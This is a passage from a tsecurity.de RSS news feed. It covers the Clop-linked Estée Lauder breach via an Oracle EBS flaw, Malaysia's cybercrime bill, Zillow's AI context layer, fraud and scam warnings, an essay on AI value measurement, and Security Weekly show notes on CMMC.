<span data-contrast="auto">In October 2025, researchers from Google warned that the <a href="https://thecyberexpress.com/threat-actors/clop-ransomware-group/" target="_blank" rel="noopener">Clop ransomware group</a> had exploited the vulnerability as a zero-day to steal data. The flaw affected Oracle EBS versions 12.2.3 through 12.2.14, allowing attackers to bypass authentication and remotely execute code through the BI Publisher Integration component. Successful exploitation could provide access to sensitive HR and business information.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Oracle released <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29052">security</a> patches for CVE-2025-61882 on October 4, 2025. Soon after, <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29051">cybersecurity</a> company CrowdStrike confirmed that Clop had been exploiting the vulnerability since early August 2025.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Company Offers Identity Monitoring</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Estée Lauder, headquartered in New York, generates annual revenue of $14.3 billion, employs around 57,000 people, and operates retail stores and online businesses worldwide, making it the world's second-largest cosmetics company.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Following the Estée Lauder data breach, the company is urging recipients of its notification letter to monitor for signs of identity theft and <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29048">fraud</a>. It is also providing 24 months of complimentary identity monitoring services through Kroll.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The Estée Lauder <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29049">cyberattack</a> is part of a broader campaign that affected several high-profile organizations, including Harvard, the University of Pennsylvania, Dartmouth, the University of Phoenix, The Washington Post, Logitech, GlobalLogic, Cox Enterprises, and American Airlines subsidiary Envoy Air.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">This is not the first time the company has been impacted by Clop. In 2023, Estée Lauder was also <a href="https://thecyberexpress.com/estee-lauder-cyber-attack-alphv-ransomware/" target="_blank" rel="noopener">compromised after the ransomware group</a> exploited a separate zero-day vulnerability in the MOVEit Transfer platform, one of the company's internal software tools.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malaysia cracks down on cybercrime with new rules for digital space: ‘necessary reset’]]></title>
<description><![CDATA[Malaysia is close to overhauling its nearly 30-year-old cybercrime law and giving authorities long-sought tools to pursue online fraud, digital impersonation and AI-generated abuse, but experts say the bill’s impact will depend on whether investigators can enforce it effectively and prevent misus...]]></description>
<link>https://tsecurity.de/de/3683141/it-security-nachrichten/malaysia-cracks-down-on-cybercrime-with-new-rules-for-digital-space-necessary-reset/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683141/it-security-nachrichten/malaysia-cracks-down-on-cybercrime-with-new-rules-for-digital-space-necessary-reset/</guid>
<pubDate>Tue, 21 Jul 2026 11:11:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Malaysia is close to overhauling its nearly 30-year-old cybercrime law and giving authorities long-sought tools to pursue online fraud, digital impersonation and AI-generated abuse, but experts say the bill’s impact will depend on whether investigators can enforce it effectively and prevent misuse of its powers.
The Cybercrimes Bill 2026 was first tabled in parliament on June 22 and passed by the Dewan Rakyat, Malaysia’s lower house, on July 1. The Dewan Negara, the upper house, approved it on...]]></content:encoded>
</item>
<item>
<title><![CDATA[At VB Transform 2026, Zillow's engineering chief said AI ROI numbers only hold up if you measure before you build]]></title>
<description><![CDATA[Zillow, the real estate technology company, doesn't get one conversation with its customers. They move from a phone screen to a loan officer to a real estate agent, sometimes over months or years, and expect the context to follow them. A single chatbot could never carry that thread.At VB Transfor...]]></description>
<link>https://tsecurity.de/de/3681824/it-nachrichten/at-vb-transform-2026-zillows-engineering-chief-said-ai-roi-numbers-only-hold-up-if-you-measure-before-you-build/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681824/it-nachrichten/at-vb-transform-2026-zillows-engineering-chief-said-ai-roi-numbers-only-hold-up-if-you-measure-before-you-build/</guid>
<pubDate>Mon, 20 Jul 2026 19:18:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Zillow, the real estate technology company, doesn't get one conversation with its customers. They move from a phone screen to a loan officer to a real estate agent, sometimes over months or years, and expect the context to follow them. A single chatbot could never carry that thread.</p><p>At<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a>, Zillow SVP of Engineering Toby Roberts and Glean co-founder and CEO Arvind Jain described how they built AI architecture meant to carry context across that entire journey — and why context, not raw data, turned out to be the harder problem to solve. Zillow's products touch roughly 80% of U.S. real estate transactions each year, and the company has been using AI long before ChatGPT existed.</p><p>"We pretty quickly identified that we were going to need a persistent context layer that was going to meet our customers and the professionals wherever they were," Roberts said.</p><h2>Data was never the hard part</h2><p>Roberts said Zillow's AI effort started where most enterprise AI efforts start, with the data itself.</p><p>"We started with a large push around making sure our data did have the right foundation," Roberts said. That meant a data mesh approach, clear data lineage and a governance structure with permissions and identity attached to the data itself.</p><p>None of that turned out to be the hard problem. The hard problem was building something that remembered where a customer was in their journey and carried that forward, no matter which surface they showed up on next.</p><p>"This context layer has to live to be able to support you where you are at any given point in your journey," Roberts said. Zillow chose to own that layer itself rather than depend on a single external chat interface, a decision Roberts said the team reached quickly once it looked at the shape of a real transaction rather than a single conversation.</p><h2>Why Zillow built its own architecture, and where Glean fits into it</h2><p>Zillow built its own harness rather than route customers through a single model API. The team drew on 20 years of machine learning history behind products like Zestimate, leaning into smaller, task-specific fine-tuned models instead of one general-purpose model.</p><p>Internally, that harness runs alongside Glean. Roberts said Zillow now has thousands of Glean agents in production, handling repetitive tasks with tens of thousands of executions across the company. Glean's pitch, per Jain, is centralizing that integration work once, through the Glean MCP gateway, rather than letting finance, legal and marketing each rebuild their own connections to the same systems.</p><p>That centralization is also a cost lever. Jain pointed to two mechanisms: model routing, which sends most tasks to smaller, cheaper models instead of defaulting to frontier models, and precomputed context, which avoids an agent burning tokens assembling its own context from scratch.</p><p>"Claude is also very slow because the first part of assembling that context actually takes forever," Jain said. Routing that request through Glean instead, he said, can cut token consumption by as much as half.</p><h2>What Zillow and Glean's approach means for enterprises</h2><p>Across data, cost and permissions, the session offered a few practical takeaways for enterprises building agentic AI on their own systems.</p><p><b>Build the measurement baseline before the AI push, not after. </b>Roberts said Zillow's ability to credibly attribute a 40% increase in shipped code to AI adoption rests on a DORA metrics baseline the team put in place years earlier, not on the AI rollout itself.</p><p><b>Centralize context once instead of letting every team rebuild it.</b> Jain's core argument for Glean's platform is that duplicated integration work across finance, legal and marketing teams is a hidden cost most enterprises haven't accounted for.</p><p><b>Don't assume permission inheritance is enough for regulated data.</b> Even with a permissions-aware context platform in place, Zillow layered hard rules and a standing compliance check on top for its most sensitive categories, rather than trusting the architecture to handle it automatically.</p><p><b>Treat context as a cost lever, not just a capability.</b> Model routing and precomputed context were the two mechanisms Jain pointed to for cutting AI spend, both aimed at reducing wasted token consumption rather than adding new capability.</p><p>"Models by themselves are not enough to bring automation with AI inside your enterprise," Jain said. "You do have to connect it with your enterprise context."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sri Lanka Treasury’s USD 2.5 Million Loss Ruled Cybercrime Fraud]]></title>
<description><![CDATA[  Sri Lanka’s recent finding that a USD 2.5 million Treasury loss was the result of cybercrime highlights how vulnerable government financial systems have become in the age of digital debt repayments. The case underlines that cybersecurity failures are no…
Read more →
The post Sri Lanka Treasury’...]]></description>
<link>https://tsecurity.de/de/3681378/it-security-nachrichten/sri-lanka-treasurys-usd-25-million-loss-ruled-cybercrime-fraud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681378/it-security-nachrichten/sri-lanka-treasurys-usd-25-million-loss-ruled-cybercrime-fraud/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Sri Lanka’s recent finding that a USD 2.5 million Treasury loss was the result of cybercrime highlights how vulnerable government financial systems have become in the age of digital debt repayments. The case underlines that cybersecurity failures are no…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/sri-lanka-treasurys-usd-2-5-million-loss-ruled-cybercrime-fraud/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/sri-lanka-treasurys-usd-2-5-million-loss-ruled-cybercrime-fraud/">Sri Lanka Treasury’s USD 2.5 Million Loss Ruled Cybercrime Fraud</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dubai Police warnt vor Fake-Visa-Angeboten auf Social Media und Messengern]]></title>
<description><![CDATA[DUBAI / LONDON (IT BOLTWISE) – Die Dubai Police warnt vor betrügerischen Anzeigen, die Jobs und Visa gegen Geld versprechen. Laut Anti Fraud Centre werden dafür Social-Media-Plattformen und Messaging-Apps genutzt, oft unter dem Anschein offizieller Stellen oder nicht zugelassener Anbieter. Betrof...]]></description>
<link>https://tsecurity.de/de/3681248/it-security-nachrichten/dubai-police-warnt-vor-fake-visa-angeboten-auf-social-media-und-messengern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681248/it-security-nachrichten/dubai-police-warnt-vor-fake-visa-angeboten-auf-social-media-und-messengern/</guid>
<pubDate>Mon, 20 Jul 2026 15:23:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-dubai-police-fake-visa-scams-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">DUBAI / LONDON (IT BOLTWISE) – Die Dubai Police warnt vor betrügerischen Anzeigen, die Jobs und Visa gegen Geld versprechen. Laut Anti Fraud Centre werden dafür Social-Media-Plattformen und Messaging-Apps genutzt, oft unter dem Anschein offizieller Stellen oder nicht zugelassener Anbieter. Betroffene sollen Zahlungen und die Weitergabe persönlicher Daten unterlassen, wenn die Abwicklung nicht über zuständige […]</p>
<div><a href="https://www.it-boltwise.de/dubai-police-warnt-vor-fake-visa-angeboten-auf-social-media-und-messengern.html">... den vollständigen Artikel <strong>»Dubai Police warnt vor Fake-Visa-Angeboten auf Social Media und Messengern«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/dubai-police-warnt-vor-fake-visa-angeboten-auf-social-media-und-messengern.html">Dubai Police warnt vor Fake-Visa-Angeboten auf Social Media und Messengern</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, activity is not value]]></title>
<description><![CDATA[The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.



For decades, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earni...]]></description>
<link>https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</guid>
<pubDate>Mon, 20 Jul 2026 13:08:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.</p>



<p class="wp-block-paragraph"><a href="https://techeconomists.com/why-the-world-needs-new-economic-indicators/">For decades</a>, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earnings per share, labor productivity, return on investment and market share became the dominant indicators of organizational success because they reflected the economic realities of a world in which value creation was primarily tied to physical production, labor efficiency, scale and later the automation of information processing. AI, however, is altering the very structure of enterprise value creation, and in doing so it is creating a widening separation between perceived future value and actual realized economic performance.</p>



<p class="wp-block-paragraph">Much of the current discussion <a href="https://howardarubin.substack.com/p/why-ai-roi-is-so-darn-hard-to-measure">surrounding AI performance measurement</a> reflects this tension. The overwhelming majority of AI-related metrics being celebrated today are not direct measures of realized enterprise outcomes. They are largely indicators of capability formation, market positioning, experimentation or investor signaling. Metrics such as AI spending levels, number of AI use cases, GPUs deployed, copilots implemented, models placed into production, AI hiring growth or agentic AI pilots all serve primarily as proxies for anticipated future advantage. These indicators may influence stock valuations, analyst sentiment and strategic narratives, but their relationship to measurable operational performance is often indirect, delayed or in some cases entirely speculative.</p>



<p class="wp-block-paragraph">This distinction is critically important because capital markets have historically rewarded the <em>expectation</em> of technological transformation long before actual economic results materialized. During previous technological revolutions—including electrification, enterprise resource planning, the internet, cloud computing and mobile platforms—valuation expansion frequently preceded measurable productivity gains by many years. The market priced future possibility before operational economics caught up. In many instances, investors rewarded firms simply for appearing strategically aligned with the dominant technological shift of the era. AI appears to be following a similar trajectory.</p>



<p class="wp-block-paragraph">The phenomenon resembles the famous <a href="https://www.brookings.edu/articles/the-solow-productivity-paradox-what-do-computers-do-to-productivity/">productivity paradox</a> articulated by economist Robert Solow, who observed that “you can see the computer age everywhere but in the productivity statistics.” AI today is visible everywhere: in investor presentations, earnings calls, technology conferences, product announcements and boardroom strategies. Yet in many industries, its measurable contribution to enterprise productivity, profitability or economic resilience remains difficult to isolate with precision. This does not necessarily mean AI lacks value. Rather, it reflects the reality that traditional accounting and performance systems were never designed to measure the forms of value AI increasingly produces.</p>



<p class="wp-block-paragraph">Artificial intelligence creates benefits that are often diffuse, cumulative and difficult to attribute directly to financial outcomes. AI may improve forecasting accuracy, reduce fraud, accelerate decision cycles, augment employee effectiveness, improve customer interactions, optimize logistics or enhance cybersecurity resilience. These benefits frequently manifest as second-order effects distributed across the enterprise rather than as immediately visible financial events. The causal chain between AI investment and realized business performance can therefore become extraordinarily difficult to quantify. A company may become operationally more intelligent without immediately becoming measurably more profitable.</p>



<p class="wp-block-paragraph">At the same time, AI introduces a profound danger: organizations may increasingly optimize for technological narrative rather than durable enterprise economics. Many firms today are pursuing AI primarily because markets reward the appearance of AI leadership. Investor enthusiasm, analyst pressure and competitive fear create incentives to demonstrate visible AI activity <a href="https://howardarubin.substack.com/p/talking-about-ai-value-is-like-talking">regardless of whether measurable economic value has actually been achieved</a>. In this environment, AI metrics can easily become instruments of valuation signaling rather than instruments of operational truth.</p>



<p class="wp-block-paragraph">This distinction between signaling and substance may become one of the defining economic challenges of the AI era. An organization may announce aggressive AI deployment programs, reduce headcount and report short-term margin improvements while simultaneously increasing hidden forms of technological fragility. Infrastructure costs may rise dramatically as GPU consumption, cloud usage, data engineering requirements and cybersecurity complexity expand. Technical debt may accelerate as AI-generated code proliferates without sufficient architectural discipline. Institutional knowledge may erode as organizations become excessively dependent on opaque models and automated systems. Long-term innovation capacity may weaken if enterprises divert disproportionate resources toward maintaining internally generated AI systems rather than building new strategic capabilities.</p>



<h2 class="wp-block-heading">What measuring AI value might actually look like</h2>



<p class="wp-block-paragraph">The distinction between AI activity and AI value becomes clearer when viewed through the kinds of measures organizations choose to track. Many enterprises today emphasize indicators such as the number of AI models deployed, copilots implemented, agents created, prompts executed, tokens consumed or employees using AI tools. These metrics demonstrate adoption and technological activity, but they reveal relatively little about whether AI is producing meaningful business outcomes.</p>



<p class="wp-block-paragraph">Measures of enterprise value look quite different. A manufacturer might evaluate whether AI improves demand forecasting accuracy enough to reduce inventory carrying costs or stockouts. A financial institution might measure whether AI meaningfully lowers fraud losses, accelerates loan processing or improves regulatory compliance. A healthcare provider could assess reductions in administrative burden, faster clinical decision support or improvements in patient throughput. In each case, the objective is not simply to measure AI deployment, but to determine whether AI creates measurable improvements in operational performance, economic outcomes or organizational resilience.</p>



<p class="wp-block-paragraph">Ultimately, organizations may need to ask a different question: not “How much AI are we using?” but “How much business value does each unit of AI investment create?” That shift—from measuring technological activity to measuring economic outcomes—may become one of the defining management disciplines of the AI era.</p>



<p class="wp-block-paragraph">Under traditional accounting frameworks, many of these deteriorations remain largely invisible. Quarterly earnings may improve even as underlying enterprise resilience declines. Stock prices may rise even as operational complexity becomes increasingly unsustainable. In this sense, the AI era threatens to widen the gap between financial appearance and organizational reality.</p>



<p class="wp-block-paragraph">This is why the future of enterprise measurement cannot simply involve adding AI metrics to existing financial scorecards. The challenge is far deeper. AI forces a reconsideration of what business performance actually means. Historically, enterprises were measured largely through static indicators of efficiency and output. Increasingly, however, competitive advantage may depend less on traditional efficiency and more on adaptive intelligence: the ability of an organization to learn faster, make better decisions, integrate human and machine capabilities effectively, manage technological complexity sustainably and convert computational power into durable economic outcomes.</p>



<p class="wp-block-paragraph">The most important future performance measures may therefore revolve around questions traditional accounting rarely addresses. How effectively does an enterprise convert technology investment into sustainable business capability? How economically efficient are its AI operations relative to the value they generate? How resilient is the organization to AI failure, cybersecurity disruption or infrastructure inflation? How successfully does it preserve and amplify human expertise rather than simply eliminate labor? How rapidly can it learn, adapt and operationalize new knowledge?</p>



<p class="wp-block-paragraph">These are not merely technology questions. They are questions of enterprise economics, organizational sustainability and long-term competitive viability.</p>



<p class="wp-block-paragraph">The companies that ultimately succeed in the AI era may not be those with the largest AI budgets, the greatest number of pilots or the most aggressive automation programs. They may instead be the firms that best understand the economics of technological capability itself: organizations capable of balancing innovation with resilience, automation with human augmentation and technological ambition with sustainable operational design.</p>



<p class="wp-block-paragraph">The coming decade is therefore likely to produce a widening divide between enterprises optimizing for AI-driven valuation narratives and enterprises optimizing for measurable, durable economic performance. In the short term, these may appear to be the same thing.</p>



<p class="wp-block-paragraph">Over time, however, the distinction will become increasingly visible. Some organizations will discover that AI has enhanced genuine enterprise capability. Others will discover that they merely optimized the appearance of transformation while silently accumulating new forms of economic and operational risk.</p>



<p class="wp-block-paragraph">Artificial intelligence is not simply changing business operations. It is exposing the inadequacy of many of the measures used to evaluate business success itself. The central challenge of the AI economy may ultimately become not whether organizations adopt AI, but whether they can distinguish between technological activity and actual economic value creation.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security at Scale, CMMC phase II paused, and the Weekly Enterprise News - Keith Hollender - ESW #468]]></title>
<description><![CDATA[Interview with Keith Hollender, CEO and Co-Founder of Arcova Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged ris...]]></description>
<link>https://tsecurity.de/de/3680728/it-security-nachrichten/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-keith-hollender-esw-468/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680728/it-security-nachrichten/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-keith-hollender-esw-468/</guid>
<pubDate>Mon, 20 Jul 2026 11:37:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with Keith Hollender, CEO and Co-Founder of Arcova</h3> <p><strong>Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem</strong></p> <p>As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged risk. The challenge is no longer whether organizations should pursue AI, but how they can govern it, secure it, and operationalize it in ways that stand up to real-world business and threat conditions.</p> <p>In this conversation, Keith Hollender discusses what Arcova is seeing across enterprise environments as organizations work to connect cybersecurity, AI governance, resilience, and broader transformation priorities. He explores where companies are getting stuck, why traditional siloed approaches are falling short, and what it takes to move from strategy decks to secure execution.</p> <p>Keith also shares how Arcova's practitioner-led, relationship-driven model helps organizations turn complexity into clarity by embedding with client teams, solving urgent problems hands-on, and building capabilities designed to last. The conversation also covers Arcova's continued growth, including expansion into the Middle East, and what global demand signals reveal about the next phase of cybersecurity and AI consulting.</p> <p><strong>Segment Resources:</strong></p> <ul> <li><a rel="noopener" target="_blank" href="https://arcova.com/sectors/">https://arcova.com/sectors/</a></li> <li><a rel="noopener" target="_blank" href="https://arcova.com/category/blog/">https://arcova.com/category/blog/</a></li> </ul> <p>For more information about Arcova and how they can help your enterprise shape what's next, please visit:</p> <p><a rel="noopener" target="_blank" href="https://securityweekly.com/arcova">https://securityweekly.com/arcova</a></p> <h3>Topic: CMMC Pause creating chaos among federal contractors</h3> <p>This one sent some shockwaves through the CMMC community, particularly the hundreds or thousands of folks gearing up to assist with the validation that phase 2 aimed to provide. The TL;DR - defense contractors have been required to comply with CMMC controls for years, but self-attestation means that many probably haven't been meeting the requirements. Perhaps, rather than have tons of defense contractors fail the test, they just suspended the requirement for the test itself.</p> <p>I think Howard Holton nails it here when he says:</p> <p>"100,000 defense contractors needed third-party assessments. Roughly 100 authorized assessors exist. That's 1,000 assessments each, with the deadline in November."</p> <p>PCI already created a model that works for a scenario like this. If you're small, you self-assess. If you're big enough, an independent auditor comes to check you out once a year. I'm sure they were probably aware of this and chose not to go down that path for some reasons. I'm not aware of those reasons.</p> <p>What this means:</p> <ul> <li>Phase II is paused</li> <li>Phase I self-assessments still in place (note, however, that phase II existed, because self-attestation didn't work)</li> <li>NIST SP 800-171 Rev 2 and DFARS 252.204-7012 compliance still required</li> <li>60-day review aims to reform CMMC</li> <li>DoW opened an RFI for industry perspectives on what they should do</li> <li>CMMC characterized as a "compliance burden" and "red tape"</li> <li>False Claims Act and DOJ's cyber-fraud enforcement are still on the table</li> </ul> <p>More resources:</p> <ul> <li>CIO Davies' post on Twitter</li> <li>Administrator of the Small Business Administration, Kelly Loeffler's post</li> <li>A useful LinkedIn post that breaks down a lot of what this really means (and doesn't)</li> </ul> <h3>Weekly Enterprise News</h3> <p>Finally, in the enterprise security news,</p> <ol> <li>will AI eliminate more cybersecurity jobs than it creates?</li> <li>Linus's law, amended</li> <li>the biggest patch Tuesday ever</li> <li>AI context bombs</li> <li>AI workflows are a security disaster</li> <li>people using AI in areas they don't understand</li> <li>ransomware crews are hitting legal firms hard</li> <li>lessons learned from CISA's recent github leak</li> <li>demystify your USB cables!</li> </ol> <p>All that and more, on this episode of Enterprise Security Weekly.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-468">https://securityweekly.com/esw-468</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security at Scale, CMMC phase II paused, and the Weekly Enterprise News - ESW #468]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Interview with Keith Hollender, CEO and Co-Founder of Arcova

Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem

As enterprises move from AI experimentation to adoption at scale, security leaders ...]]></description>
<link>https://tsecurity.de/de/3680666/it-security-video/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-esw-468/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680666/it-security-video/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-esw-468/</guid>
<pubDate>Mon, 20 Jul 2026 11:03:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/SwBWFeUzACI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with Keith Hollender, CEO and Co-Founder of Arcova<br />
<br />
Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem<br />
<br />
As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged risk. The challenge is no longer whether organizations should pursue AI, but how they can govern it, secure it, and operationalize it in ways that stand up to real-world business and threat conditions.<br />
<br />
In this conversation, Keith Hollender discusses what Arcova is seeing across enterprise environments as organizations work to connect cybersecurity, AI governance, resilience, and broader transformation priorities. He explores where companies are getting stuck, why traditional siloed approaches are falling short, and what it takes to move from strategy decks to secure execution.<br />
<br />
Keith also shares how Arcova’s practitioner-led, relationship-driven model helps organizations turn complexity into clarity by embedding with client teams, solving urgent problems hands-on, and building capabilities designed to last. The conversation also covers Arcova’s continued growth, including expansion into the Middle East, and what global demand signals reveal about the next phase of cybersecurity and AI consulting.<br />
<br />
Segment Resources:<br />
- https://arcova.com/sectors/  <br />
- https://arcova.com/category/blog/<br />
<br />
For more information about Arcova and how they can help your enterprise shape what's next, please visit: https://securityweekly.com/arcova<br />
<br />
Topic: CMMC Pause creating chaos among federal contractors<br />
<br />
This one sent some shockwaves through the CMMC community, particularly the hundreds or thousands of folks gearing up to assist with the validation that phase 2 aimed to provide.<br />
The TL;DR - defense contractors have been required to comply with CMMC controls for years, but self-attestation means that many probably haven't been meeting the requirements. Perhaps, rather than have tons of defense contractors fail the test, they just suspended the requirement for the test itself.<br />
<br />
I think Howard Holton nails it here when he says:<br />
<br />
"100,000 defense contractors needed third-party assessments. Roughly 100 authorized assessors exist. That's 1,000 assessments each, with the deadline in November."<br />
<br />
PCI already created a model that works for a scenario like this. If you're small, you self-assess. If you're big enough, an independent auditor comes to check you out once a year. I'm sure they were probably aware of this and chose not to go down that path for some reasons. I'm not aware of those reasons.<br />
<br />
What this means:<br />
<br />
- Phase II is paused<br />
- Phase I self-assessments still in place (note, however, that phase II existed, because self-attestation didn't work)<br />
- NIST SP 800-171 Rev 2 and DFARS 252.204-7012 compliance still required<br />
- 60-day review aims to reform CMMC<br />
- DoW opened an RFI for industry perspectives on what they should do<br />
- CMMC characterized as a "compliance burden" and "red tape"<br />
- False Claims Act and DOJ's cyber-fraud enforcement are still on the table<br />
<br />
More resources:<br />
<br />
- CIO Davies' post on Twitter<br />
- Administrator of the Small Business Administration, Kelly Loeffler's post<br />
- A useful LinkedIn post that breaks down a lot of what this really means (and doesn't)<br />
<br />
Weekly Enterprise News<br />
<br />
Finally, in the enterprise security news, <br />
<br />
1. will AI eliminate more cybersecurity jobs than it creates?<br />
2. Linus’s law, amended<br />
3. the biggest patch Tuesday ever<br />
4. AI context bombs<br />
5. AI workflows are a security disaster<br />
6. people using AI in areas they don’t understand<br />
7. ransomware crews are hitting legal firms hard<br />
8. lessons learned from CISA’s recent github leak<br />
9. demystify your USB cables!<br />
<br />
All that and more, on this episode of Enterprise Security Weekly.<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-468<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dubai Police Warns Against Online Scams Promising Work and Visit Visas]]></title>
<description><![CDATA[The Dubai Police fraudulent visa ads warning has cautioned the public against scams offering work visas, residency visas, and visit visas in exchange for money. According to the Anti Fraud Centre at Dubai Police's General Department of Criminal Investigation, fraudsters are using social media pla...]]></description>
<link>https://tsecurity.de/de/3680534/it-security-nachrichten/dubai-police-warns-against-online-scams-promising-work-and-visit-visas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680534/it-security-nachrichten/dubai-police-warns-against-online-scams-promising-work-and-visit-visas/</guid>
<pubDate>Mon, 20 Jul 2026 10:07:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
